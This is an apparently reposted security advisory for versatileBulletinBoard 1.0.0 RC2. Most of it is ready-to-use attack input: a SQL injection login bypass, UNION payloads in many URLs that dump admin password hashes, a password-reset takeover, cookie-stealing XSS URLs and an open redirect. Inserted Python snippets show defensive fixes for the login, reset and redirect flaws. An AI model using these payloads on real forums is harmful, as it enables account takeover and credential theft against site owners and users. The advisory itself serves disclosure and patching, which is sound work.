Software exploits and vulnerabilities on ground418

Original text (English):

versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)

multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure

software:

site: http://vbb.eniki.de/

if magic_quotes_gpc is off...



A)

i) SQL INJECTION / LOGIN BYPASS

you can login as admin by typing:

login: ' or 1 and name='[adminname]'/*

pass: [whatever]

you can also login with the credentials/rights of any user by typing:

login: ' or 1 and name='[username]'/*

pass: [whatever]
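As an added illustration (not part of rgod's advisory and not the board's code), the following Python/SQLite stand-in for the PHP login shows why the payload above works against a query built by string concatenation and why it fails once the username is a bound parameter and the password hash is compared in application code. The table layout, column names and SHA-256 hashing are constructed assumptions, not the board's real schema.

```python
import hashlib
import hmac
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the board's user table (not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE vbb_user (ID INTEGER, name TEXT, pass TEXT)")
    # Demo only: plain SHA-256; a real application needs a slow password hash.
    db.execute("INSERT INTO vbb_user VALUES (11, 'admin', ?)",
               (hashlib.sha256(b"correct horse").hexdigest(),))
    return db


def login_concat(db, login, password):
    """Vulnerable pattern: the submitted name is spliced into the SQL text, so with
    magic_quotes_gpc off the quote and the /* comment rewrite the WHERE clause."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = f"SELECT ID, name FROM vbb_user WHERE name='{login}' AND pass='{pw_hash}'"
    return db.execute(sql).fetchone()


def login_param(db, login, password):
    """Hardened pattern: the name is a bound parameter (never parsed as SQL) and the
    password hash is checked in application code with a constant-time compare."""
    row = db.execute("SELECT ID, name, pass FROM vbb_user WHERE name = ?",
                     (login,)).fetchone()
    if row is None:
        return None
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    if not hmac.compare_digest(row[2], pw_hash):
        return None
    return (row[0], row[1])
```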



ii) SQL INJECTION in the "search this thread" feature when you browse the forum:

%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user where name='[admin_nickname]'/*

(you can't do it manually, the input field is too small, but you can modify the POST...)





iii) SQL INJECTION in the index.php "select" argument

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

iv) SQL INJECTION in the index.php "categ" argument

http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

also, we have:

http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

(to list the USER ID number of any user; this will be useful later, you will see... however, the admin's user ID is usually "11")





v) SQL INJECTION in the "to" argument when you post a private message (you need to login to do this):

http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*





vi) SQL INJECTION in the search for posts feature:

%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*





vii) SQL INJECTION:

http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*





viii) SQL INJECTION when you view a user profile:

http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

with ii), iii), iv), v), vi), vii) and viii) you will see the admin's MD5 password hash on screen





ix) SQL INJECTION: you can list all users, which could be useful to dump all passwords from the database:

http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*

to see if your installation is vulnerable, just type ' in the login field; if you get a SQL error, it is



x) SQL INJECTION in the "forgot password" feature: a user could manipulate the email field to send himself new passwords for any admin/user

you will receive a link like this:

http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password hash]

to set up a new password, but... you can call this URL at any time if you have the hash
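The safer design for the set-password link above, added here as an example that is not the board's code: the reset step is authorised by a random, single-use, time-limited token of which only the hash is stored, so knowing a user's existing password hash (as obtained through the injections above) no longer lets anyone complete the reset. The in-memory store and the 15-minute lifetime are assumptions of this example.

```python
import hashlib
import secrets
import time

# Constructed store: sha256(token) -> (user_id, expiry timestamp). A real board
# would keep this in its database alongside the user row.
RESET_TTL_SECONDS = 15 * 60


def _token_hash(token):
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(store, user_id, now=None):
    """Create the token that goes into the e-mailed link. It is unpredictable
    (256 bits from the OS CSPRNG) and is never derived from the password hash."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    store[_token_hash(token)] = (user_id, now + RESET_TTL_SECONDS)
    return token


def redeem_reset_token(store, token, now=None):
    """Handler for the setpass step: returns the user id only if the token is
    known, unexpired and unused. The entry is removed on first use either way."""
    now = time.time() if now is None else now
    entry = store.pop(_token_hash(token), None)
    if entry is None:
        return None
    user_id, expires_at = entry
    if now > expires_at:
        return None
    return user_id
```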





combining these issues a user can take full control of the board, reset all passwords...

proof of concept exploit incoming...





B)

xi) XSS:

possible cross site scripting; you can craft a malicious URL to redirect a user to an arbitrary location:

http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]

and you can manipulate user cookies, PoC:

http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--

http://[target]/[path]/imagewin.php?file="><script>alert(document.cookie)</script>

also, you can craft malicious URLs that, by manipulating SQL queries, will display some evil JavaScript, PoC:

http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*
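One way to close both dereferrer.php problems above (open redirect and reflected script in the echoed url parameter), added here as an example in Python standing in for the PHP handler and not the board's own code: the board signs every outbound link it emits with an HMAC so only URLs it generated are accepted, rejects non-http(s) schemes, and HTML-escapes the value before rendering it. The key, the function names and the page text are assumptions of this example.

```python
import hashlib
import hmac
import html
from urllib.parse import quote, urlsplit


def sign_url(url, key):
    """HMAC-SHA256 over the exact target URL; key is a server-side secret."""
    return hmac.new(key, url.encode(), hashlib.sha256).hexdigest()


def make_dereferrer_link(url, key):
    """Board side: the only place dereferrer links are produced, so a signature
    proves the target was chosen by the board, not pasted into the address bar."""
    return f"dereferrer.php?url={quote(url, safe='')}&sig={sign_url(url, key)}"


def dereferrer_page(url, sig, key):
    """Request handler: validate scheme and signature, then render with escaping
    instead of echoing the raw parameter into the HTML."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "<p>Invalid link.</p>"
    if not hmac.compare_digest(sig, sign_url(url, key)):
        return "<p>Invalid link.</p>"
    safe = html.escape(url, quote=True)  # neutralises ", <, > and & in the attribute
    return f'<p>Leaving the board: <a href="{safe}">{safe}</a></p>'
```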





C)

xii) information disclosure:

this is an online utility, but listing all files and versions doesn't seem very safe ;)

http://[target]/[path]/getversions.php

rgod

site: http://rgod.altervista.org

mail: retrogod at aliceposta it
